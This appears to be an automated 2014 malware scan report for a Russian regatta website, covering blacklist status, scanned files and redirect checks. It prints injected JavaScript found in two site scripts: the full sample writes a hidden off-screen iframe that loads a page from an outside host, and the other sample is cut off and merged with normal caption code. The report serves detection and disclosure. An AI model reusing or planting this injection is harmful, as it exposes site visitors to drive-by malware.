Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=realmencup.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://realmencup.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://realmencup.ru/ | 200 OK Content-Length: 23214 Content-Type: text/html | clean |
http://realmencup.ru/media/system/js/caption.js | 200 OK Content-Length: 2975 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if ( element.title != "" ) { container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); Antivirus reports:
| ||
http://realmencup.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 95206 Content-Type: application/x-javascript | clean |
http://realmencup.ru/cache/widgetkit/widgetkit-364b5e23.js | 200 OK Content-Length: 22177 Content-Type: application/x-javascript | clean |
http://realmencup.ru/modules/mod_news_show_gk3/scripts/engine_1_11_compressed.js | 200 OK Content-Length: 2572 Content-Type: application/x-javascript | clean |
http://realmencup.ru/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js | 200 OK Content-Length: 969 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!ulrcont && bb) { document.write('<iframe src="http://glasoretas.yongki.us/matrosikasuhan15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="lastshow=1; path=/; expires="+date.toUTCString(); } } Visitrepositorium(); Antivirus reports:
| ||
http://realmencup.ru/modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js | 200 OK Content-Length: 8226 Content-Type: application/x-javascript | clean |
http://realmencup.ru/o-proekte/ | 200 OK Content-Length: 14232 Content-Type: text/html | clean |
http://realmencup.ru/organizatory/ | 200 OK Content-Length: 13293 Content-Type: text/html | clean |
http://realmencup.ru/informacionnye-partnery/ | 200 OK Content-Length: 15157 Content-Type: text/html | clean |
http://realmencup.ru/komandy/ | 200 OK Content-Length: 14924 Content-Type: text/html | clean |
http://realmencup.ru/celi-i-zadachi/ | 200 OK Content-Length: 14077 Content-Type: text/html | clean |
http://realmencup.ru/yahty/ | 200 OK Content-Length: 13560 Content-Type: text/html | clean |
http://realmencup.ru/programma-regaty/ | 200 OK Content-Length: 19457 Content-Type: text/html | clean |
http://realmencup.ru/pr-vozmozhnosti/ | 200 OK Content-Length: 27783 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: realmencup.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 26 Aug 2014 10:06:20 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 26 Aug 2014 10:06:20 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2eef647737eaf4ce2ae24a8b9ce0162a=ib60j84ap2k4p58bltedf3biq5; path=/
Status: 200 OK
X-Powered-By: PHP/5.3.27-pl0-gentoo
GET / HTTP/1.1
Host: realmencup.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 26 Aug 2014 10:06:20 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 26 Aug 2014 10:06:20 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2eef647737eaf4ce2ae24a8b9ce0162a=ib60j84ap2k4p58bltedf3biq5; path=/
Status: 200 OK
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: realmencup.ru
Referer: http://www.google.com/search?q=realmencup.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: realmencup.ru
Referer: http://www.google.com/search?q=realmencup.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.